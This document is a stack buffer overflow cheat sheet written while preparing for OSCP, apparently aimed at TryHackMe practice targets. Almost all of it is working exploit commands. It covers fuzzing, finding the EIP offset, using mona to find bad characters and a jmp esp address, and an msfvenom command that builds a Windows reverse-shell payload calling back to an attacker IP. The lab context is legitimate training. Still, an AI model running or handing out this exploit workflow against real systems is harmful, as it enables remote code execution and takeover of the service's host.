Created while preparing for OSCP to crack a stack BOF in under 20 minutes. These two Python scripts (fuzzer.py and eipcontroller.py, used below) are all we need.
Highly recommend the Buffer Overflow Prep room on TryHackMe to practice BOF.
pwntools is needed for the cyclic pattern functionality (pattern creation and the offset lookup used by --find-offset)
pip install --user pwntools
# Fuzz with a range to find crash point
python fuzzer.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --range "100-2100" --range-step 100
# Confirm the crash by sending a single fixed-size payload at the size that crashed the fuzzer
python fuzzer.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --size 2100
# Send a unique pattern instead of just AAAA
python fuzzer.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --size 2100 --pattern
# find the offset by providing the 4 bytes that ended up in EIP after the crash (taken from the debugger's register pane), like this
python fuzzer.py --find-offset "61 75 74 61"
# Test that we control EIP: the script sends BBBB (the default) at the offset, so EIP should read 42424242
python eipcontroller.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --offset {{1978}}
# set mona's working folder in Immunity (bytearray.bin and the compare results are written under it)
!mona config -set workingfolder c:\mona
# generate a byte array with mona to compare against the payload array; \x00 is excluded up front because a null terminates string-based input
!mona bytearray -cpb "\x00"
# Send the full_hex array (same byte set as bytearray.bin) so the copy in memory can be compared against the file to find bad chars
python eipcontroller.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --offset 1978 --check-bad-chars
# compare from the address where the full_hex array starts in the DUMP pane (normally the ESP value at the crash; adjust if NOPs or padding precede the array)
!mona compare -f c:\mona\PROJECT\bytearray.bin -a {{ESP VALUE + NOP ADDR}}
# Example !mona compare -f C:\mona\oscp\bytearray.bin -a 0189FA30
# Example bad-char compare output
# 00 07 08 2e 2f a0 a1
# Only the first byte of each adjacent pair is a confirmed bad char (00 07 2e a0); the byte following it (08 2f a1) is usually just collateral corruption caused by its predecessor.
# Exclude only the confirmed ones, regenerate bytearray.bin with the same -cpb list (e.g. !mona bytearray -cpb "\x00\x07\x2e\xa0"), resend, and re-run the compare until mona reports no differences; anything that still shows up in the diff is a genuine bad char.
# find a jmp esp (or equivalent, e.g. call esp / push esp; ret) in all loaded modules, at an address that contains none of the bad chars
# the return address must be free of bad chars, as must everything else in the payload; prefer a module that mona lists without ASLR, Rebase, SafeSEH and NXCompat so the address is stable across restarts
!mona jmp -r esp -cpb "\x00\x{{BADCHARS}}"
# example: !mona jmp -r esp -cpb "\x00\x07\x2E\xA0"
# REVERSE THE BYTE ORDER SO THE ADDRESS IS LITTLE ENDIAN (x86 is little-endian)
# Example: 0x625011af from the mona output becomes "\xAF\x11\x50\x62"
# MANUALLY PUT IT IN eipcontroller.py
eip = "\xAF\x11\x50\x62"
# Set a breakpoint on the found address in Immunity so the jump being hit can be confirmed
-> | black dotted line (go to address) > search for "625011af" > select the instruction, then F2 to toggle a breakpoint
# Test that it's hit: the breakpoint should trigger once EIP is overwritten with the jmp esp address
python eipcontroller.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --offset 1978
# LHOST/LPORT are the attacker's VPN IP and listener; -b must list every confirmed bad char (same list as -cpb); EXITFUNC=thread ends only the hijacked thread so the service keeps running after the shell exits
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.17.12.88 LPORT=443 EXITFUNC=thread -b '\x00\x07\x2E\xA0' -f c
# MANUALLY PUT THE GENERATED buf ARRAY IN eipcontroller.py
buf = "PAYLOAD"
# --nop adds a NOP sled between the return address and the payload; it is commonly needed because the encoder's decoder stub unpacks in place on the stack near ESP and would otherwise clobber itself
python eipcontroller.py --ip {{ip}} --port {{port}} --prefix "OVERFLOW1 " --offset 1978 --nop 32